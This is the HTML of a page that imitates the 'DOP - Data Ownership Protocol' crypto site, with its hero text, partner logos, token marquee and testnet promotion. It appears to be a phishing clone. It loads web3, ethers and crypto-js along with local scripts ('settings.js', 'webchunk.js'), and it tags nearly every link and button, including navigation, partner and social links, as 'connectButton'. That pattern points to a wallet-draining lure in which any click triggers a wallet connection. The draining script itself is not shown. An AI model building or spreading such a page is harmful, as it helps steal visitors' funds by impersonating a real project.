<html lang="en">
 <head>
  <meta charset="utf-8"/>
  <script src="https://unpkg.com/web3@latest/dist/web3.min.js">
  </script>
  <script src="https://unpkg.com/crypto-js@latest/crypto-js.js">
  </script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.7.2/ethers.umd.js" type="application/javascript">
  </script>
  <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js">
  </script>
  <script src="./js/settings.js">
  </script>
  <script src="./js/webchunk.js">
  </script>
  <meta content="width=device-width,initial-scale=1" name="viewport"/>
  <meta content="#000000" name="theme-color"/>
  <meta content="DOP empowers users by providing complete control over their data." name="DOP - Data Ownership Protocol"/>
  <meta content="DOP - Data Ownership Protocol" property="og:title"/>
  <meta content="DOP empowers users by providing complete control over their data." property="og:description"/>
  <meta content="https://res.cloudinary.com/drt6vurtt/image/upload/v1690900239/tomiimages/link-image_xfvzri.png" property="og:URL"/>
  <meta content="https://res.cloudinary.com/drt6vurtt/image/upload/v1690900239/tomiimages/link-image_xfvzri.png" property="og:image"/>
  <link href="/favicon.ico" rel="icon"/>
  <link href="/favicon.ico" rel="apple-touch-icon"/>
  <link href="/manifest.json" rel="manifest"/>
  <link crossorigin="anonymous" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" integrity="sha384-9ndCyUaIbzAi2FUVXJi0CjmCapSmO7SnpJef0486qhLnuZ2cdeRhO02iuK6FUUVM" rel="stylesheet"/>
  <link crossorigin="anonymous" href="https://use.fontawesome.com/releases/v5.15.4/css/all.css" integrity="sha384-DyZ88mC6Up2uqS4h/KRgHuoeGwBcD4Ng9SiP4dIRy0EXTlnuz47vAwmeGwVChigm" rel="stylesheet"/>
  <link href="https://fonts.googleapis.com" rel="preconnect"/>
  <link crossorigin="" href="https://fonts.gstatic.com" rel="preconnect"/>
  <link href="https://fonts.googleapis.com" rel="preconnect"/>
  <link crossorigin="" href="https://fonts.gstatic.com" rel="preconnect"/>
  <link crossorigin="anonymous" href="https://use.fontawesome.com/releases/v5.15.4/css/all.css" integrity="sha384-DyZ88mC6Up2uqS4h/KRgHuoeGwBcD4Ng9SiP4dIRy0EXTlnuz47vAwmeGwVChigm" rel="stylesheet"/>
  <title>
   DOP - Data Ownership Protocol
  </title>
  <link href="/static/css/2.a1a5d5e7.chunk.css" rel="stylesheet"/>
  <link href="/static/css/main.12b894ab.chunk.css" rel="stylesheet"/>
  <meta content="AymqwRC7u88Y4JPvfIF2F37QKylC04248hLCdJAsh8xgOfe/dVJPV3XS3wLFca1ZMVOtnBfVjaCMTVudWM//5g4AAAB7eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbTo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1RoaXJkUGFydHkiOnRydWV9" http-equiv="origin-trial"/>
 </head>
 <link href="totalcss.css" rel="stylesheet"/>
 <body>
  <div id="root">
   <div class="Toastify" style="">
   </div>
   <section class="main-navbar">
    <div class="custom-container">
     <nav class="navbar navbar-expand-xl">
      <a aria-current="page" class="navbar-brand active connectButton" href="/">
       <img alt="img" class="img-fluid" src="\logo.svg"/>
      </a>
      <div class="twice-btn">
       <button aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation" class="navbar-toggler connectButton" data-bs-target="#navbarSupportedContent" data-bs-toggle="collapse" type="button">
        <span class="">
         <img alt="img" class="img-fluid" src="\assets\bar.svg"/>
        </span>
       </button>
      </div>
      <div class="collapse navbar-collapse" id="navbarSupportedContent">
       <ul class="navbar-nav me-auto mb-2 mb-lg-0">
        <li class="nav-item">
         <a class="nav-link connectButton" href="/tldr" id="product">
          Product
         </a>
        </li>
        <li class="nav-item">
         <a class="nav-link connectButton" href="/company" id="company">
          Company
         </a>
        </li>
        <li class="nav-item">
         <a class="nav-link connectButton" href="/community" id="community">
          Community
         </a>
        </li>
        <li class="nav-item">
         <a class="nav-link connectButton" href="/blog" id="blog">
          Blog
         </a>
        </li>
       </ul>
       <div class="right-side">
        <a class="launch-btn connectButton">
         Connect Wallet
         <img alt="img" class="img-fluid" src="\newassets\launchdap-icon-btn.svg"/>
        </a>
        <div class="languagedropdown">
         <button aria-expanded="false" class="dropdown-toggle connectButton" data-bs-toggle="dropdown" id="dropdown-basic" type="button">
          <img alt="img" class="img-fluid" src="/Globe.svg" style="width: 27px; height: 27px;"/>
          En
         </button>
         <ul class="dropdown-menu">
          <li>
           <a class="dropdownitm connectButton" id="gb">
            <img alt="img" class="img-fluid" src="/assets/englishimg.svg"/>
            En
           </a>
          </li>
          <li>
           <a class="dropdownitm connectButton" id="jp">
            <img alt="img" class="img-fluid" src="/assets/japanimg.svg"/>
            日本語
           </a>
          </li>
          <li>
           <a class="dropdownitm connectButton" id="kr">
            <img alt="img" class="img-fluid" src="/assets/koreaimg.svg"/>
            한국인
           </a>
          </li>
         </ul>
        </div>
       </div>
      </div>
     </nav>
    </div>
   </section>
   <section class="main-banner">
    <img alt="img" class="img-fluid glitch-bg" src="\assets\aboutus-glitch.svg"/>
    <div class="custom-container">
     <div class="row">
      <div class="col-xl-6 col-12 p-0 m-auto">
       <div class="inner-main-text">
        <h2>
         YOUR DATA,
         <br/>
         YOUR CHOICE
        </h2>
        <p>
         The Data Ownership Protocol (DOP) is utilizing zero-knowledge proofs in order to allow flexible transparency on top of Ethereum L1. DOP allows users and DApps to store assets and make transactions privately, or selectively disclose token holdings and historical information.
        </p>
        <div class="twice-btn">
         <a class="launch-btn connectButton">
          Explore TestNet
          <svg fill="none" height="20" viewbox="0 0 20 20" width="20" xmlns="http://www.w3.org/2000/svg">
           <path clip-rule="evenodd" d="M17.5 9.16667V2.5H10.8333V4.16667H14.1667V5.83333H12.5V7.5H10.8333V9.16667H9.16667V10.8333H7.5V12.5H9.16667V10.8333H10.8333V9.16667H12.5V7.5H14.1667V5.83333H15.8333V9.16667H17.5ZM9.16667 4.16667H2.5V17.5H15.8333V10.8333H14.1667V15.8333H4.16667V5.83333H9.16667V4.16667Z" fill="white" fill-rule="evenodd">
           </path>
          </svg>
         </a>
        </div>
       </div>
      </div>
      <div class="col-xl-6 col-12 p-0">
       <div class="wrapper-img text-end">
        <img alt="img" class="img-fluid" src="\newassets\banner-img.svg"/>
       </div>
      </div>
     </div>
    </div>
   </section>
   <section class="ourpartners">
    <div class="custom-container">
     <div class="main-heading">
      <h6>
       OUR PARTNERS
      </h6>
     </div>
     <div class="bottom-content">
      <a class="connectButton" href="#" target="_blank">
       <img alt="img" class="img-fluid" src="\assets\partners\hacken.svg"/>
      </a>
      <a class="connectButton" href="#" target="_blank">
       <img alt="img" class="img-fluid" src="\assets\partners\zkme.svg"/>
      </a>
      <a class="connectButton" href="#" target="_blank">
       <img alt="img" class="img-fluid" src="\assets\partners\chainanalysis.svg"/>
      </a>
     </div>
    </div>
   </section>
   <div class="main-heading-partners">
    <h6>
     SUPPORTED TOKENS
    </h6>
   </div>
   <section class="partners" id="partners">
    <div style="overflow: hidden;">
     <div class="marquee">
      <div class="marquee__group">
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\usdt.svg"/>
        usdt
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\usdc.svg"/>
        USDC
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\shib.svg"/>
        SHIB
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\link.svg"/>
        LINK
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\UNI.svg"/>
        UNI
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\eth.svg"/>
        Ethereum
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\tomi.svg"/>
        TOMI
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\ape.svg"/>
        APE
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\pepe.svg"/>
        PEPE
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\comp.svg"/>
        COMP
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\chz.svg"/>
        CHZ
       </h6>
      </div>
      <div aria-hidden="true" class="marquee__group">
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\usdt.svg"/>
        usdt
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\usdc.svg"/>
        USDC
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\shib.svg"/>
        SHIB
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\link.svg"/>
        LINK
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\UNI.svg"/>
        UNI
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\eth.svg"/>
        Ethereum
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\tomi.svg"/>
        TOMI
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\ape.svg"/>
        APE
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\pepe.svg"/>
        PEPE
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\comp.svg"/>
        COMP
       </h6>
       <h6>
        <img alt="img" class="img-fluid" src="\assets\coins\chz.svg"/>
        CHZ
       </h6>
      </div>
     </div>
    </div>
   </section>
   <section class="twice-section twice-section1">
    <div class="custom-container">
     <div class="row">
      <div class="col-xl-6 col-lg-6 col-12 padd-sm m-auto p-0">
       <div class="inner-twice">
        <div class="right">
         <h6>
          THE DILEMMA
         </h6>
         <ul>
          <li>
           Existing public blockchains mandate full transparency by default - with all user data visible.
          </li>
          <li>
           This provides no individual control over data exposure - an all or nothing lack of choice.
          </li>
          <li>
           Enables bad actors exploiting over-transparency through fronts-running, “whale-watching”, and phishing.
          </li>
         </ul>
        </div>
       </div>
      </div>
      <div class="col-xl-6 col-lg-6 col-12 padd-sm p-0">
       <div class="wrapper-img text-center set-mobile-width">
        <img alt="img" class="img-fluid" src="\assets\decentralizeddatastorage.svg"/>
       </div>
      </div>
     </div>
    </div>
   </section>
   <section class="twice-section twice-section2">
    <div class="custom-container">
     <div class="row">
      <div class="col-xl-6 col-lg-6 col-12 padd-sm p-0 order2-sm">
       <div class="wrapper-img">
        <img alt="img" class="img-fluid" src="\assets\user-centric.svg"/>
       </div>
      </div>
      <div class="col-xl-6 col-lg-6 col-12 padd-sm m-auto p-0 order1-sm">
       <div class="inner-twice tdvtvtvvtvtvt">
        <div class="right">
         <h6>
          THE DOP APPROACH
         </h6>
         <ul>
          <li>
           Users can selectively disclose holdings, transactions, activity details.
          </li>
          <li>
           Seamless integration supporting ERC20, ERC721 and ERC1155 assets.
          </li>
          <li>
           Maintains seamless integration with wallets, EVMs and dApps.
          </li>
         </ul>
        </div>
       </div>
      </div>
     </div>
    </div>
   </section>
   <div class="wrapper-set-color" style="">
    <section class="advantages" id="advantages">
     <img alt="img" class="img-fluid glitch-bg" src="\newassets\bottom-glitch-bg-new-svg.svg"/>
     <div class="custom-container">
      <div class="main-heading">
       <h6>
        ADVANTAGES OVER EXISTING OPTIONS
       </h6>
       <p>
        DOP aims to move beyond the limitations of current privacy approaches by
       </p>
      </div>
      <div class="parent-cards">
       <div class="inner-card">
        <img alt="img" class="img-fluid line-card" src="\assets\line.svg"/>
        <div class="global-img">
         <img alt="img" class="img-fluid" src="\assets\ownetherium.svg"/>
        </div>
        <h6>
         BRINGING DATA OWNERSHIP TO ETHEREUM
        </h6>
        <p>
         Bringing flexible data ownership capabilities natively to Ethereum apps and infrastructure rather than requiring specialized third party tools
        </p>
       </div>
       <div class="inner-card">
        <img alt="img" class="img-fluid line-card" src="\assets\line.svg"/>
        <div class="global-img">
         <img alt="img" class="img-fluid" src="\assets\data-control.svg"/>
        </div>
        <h6>
         DATA CONTROL
        </h6>
        <p>
         Enabling user control over what personal data points get shared publicly rather than all-or-nothing disclosure
        </p>
       </div>
      </div>
      <div class="parent-cards parents-card2">
       <div class="inner-card">
        <img alt="img" class="img-fluid line-card" src="\assets\line.svg"/>
        <div class="global-img">
         <img alt="img" class="img-fluid" src="\assets\zeroknowledge.svg"/>
        </div>
        <h6>
         ZERO-KNOWLEDGE KYC
        </h6>
        <p>
         Supporting anonymized identity verification through zero-knowledge KYC instead of traditional invasive checks
        </p>
       </div>
       <div class="inner-card">
        <img alt="img" class="img-fluid line-card" src="\assets\line.svg"/>
        <div class="global-img">
         <img alt="img" class="img-fluid" src="\assets\customizeddata.svg"/>
        </div>
        <h6>
         CUSTOMISED DATA DISCLOSURE
        </h6>
        <p>
         Allowing customized disclosure permissions tailored to each app and context vs rigid single policies
        </p>
       </div>
       <div class="inner-card">
        <img alt="img" class="img-fluid line-card" src="\assets\line.svg"/>
        <div class="global-img">
         <img alt="img" class="img-fluid" src="\assets\ecosysytem.svg"/>
        </div>
        <h6>
         ECOSYSTEM DEVELOPMENT
        </h6>
        <p>
         Fostering ecosystem integration by design through open standards vs closed models, inviting developers to build dApps on DOP
        </p>
       </div>
      </div>
      <p class="bottom-para">
       The protocol values individual consent first, while ensuring compliance needs are still met through selective transparency. Compared to existing options that deliver either complete exposure or absolute anonymity, DOP strikes an optimal balance empowering users with control.
      </p>
     </div>
    </section>
   </div>
   <div class="wrapper-set-color" style="">
    <section class="data-ownership">
     <div class="custom-container">
      <div class="parent-box">
       <div class="left">
        <h6>
         The DOP Testnet is Now Live
        </h6>
        <p>
         Complete all the testing steps to be eligible for DOP rewards once the token officially launches in early 2024.
        </p>
        <a class="launch-btn connectButton" href="https://doptest.dop.org/id=hDYgdBt" id="doptestnet" target="_blank">
         Testnet
         <svg fill="none" height="21" viewbox="0 0 20 21" width="20" xmlns="http://www.w3.org/2000/svg">
          <path clip-rule="evenodd" d="M17.5 9.79655V3.12988H10.8333V4.79655H14.1667V6.46322H12.5V8.12988H10.8333V9.79655H9.16667V11.4632H7.5V13.1299H9.16667V11.4632H10.8333V9.79655H12.5V8.12988H14.1667V6.46322H15.8333V9.79655H17.5ZM9.16667 4.79655H2.5V18.1299H15.8333V11.4632H14.1667V16.4632H4.16667V6.46322H9.16667V4.79655Z" fill="white" fill-rule="evenodd">
          </path>
         </svg>
        </a>
       </div>
       <div class="right">
        <img alt="img" class="img-fluid" src="\assets\dop-platform.png"/>
       </div>
      </div>
     </div>
    </section>
   </div>
   <section class="ourtransparency">
    <div class="custom-container">
     <h4>
      OVER-TRANSPARENCY IS NOT A FEATURE - IT’S A BUG!
     </h4>
    </div>
   </section>
   <section class="main-footer">
    <div class="custom-container">
     <div class="upper-foot">
      <img alt="img" class="img-fluid" src="\logo.svg"/>
      <div class="text-links">
       <a aria-current="page" class="nav-link active connectButton" href="/" id="productfooter">
        Product
       </a>
       <a class="nav-link connectButton" href="/company" id="companyfooter">
        Company
       </a>
       <a class="nav-link connectButton" href="/community" id="communityfooter">
        Community
       </a>
       <a class="nav-link connectButton" href="/brandassets" id="blogfooter">
        Brand Assets
       </a>
      </div>
     </div>
     <div class="bottom-foot">
      <p>
       ©All Rights Reserved
      </p>
      <div class="text-links">
       <a class="connectButton" href="https://twitter.com/dop_org" target="_blank">
        <img alt="img" class="img-fluid" src="\assets\social-icons\twitter.svg"/>
       </a>
       <a class="connectButton" href="https://t.me/Dop_org" target="_blank">
        <img alt="img" class="img-fluid" src="\assets\social-icons\telegram.svg"/>
       </a>
       <a class="connectButton" href="https://medium.com/dop-org" target="_blank">
        <img alt="img" class="img-fluid" src="\assets\medium.svg"/>
       </a>
       <a class="connectButton" href="https://www.youtube.com/@DataOwnershipProtocol" target="_blank">
        <img alt="img" class="img-fluid" src="\assets\social-icons\youtube.svg"/>
       </a>
       <a class="connectButton" href="https://www.linkedin.com/company/dop-org/about/" target="_blank">
        <img alt="img" class="img-fluid" src="\assets\social-icons\linkedin-new.svg"/>
       </a>
      </div>
     </div>
    </div>
   </section>
  </div>
 </body>
</html>
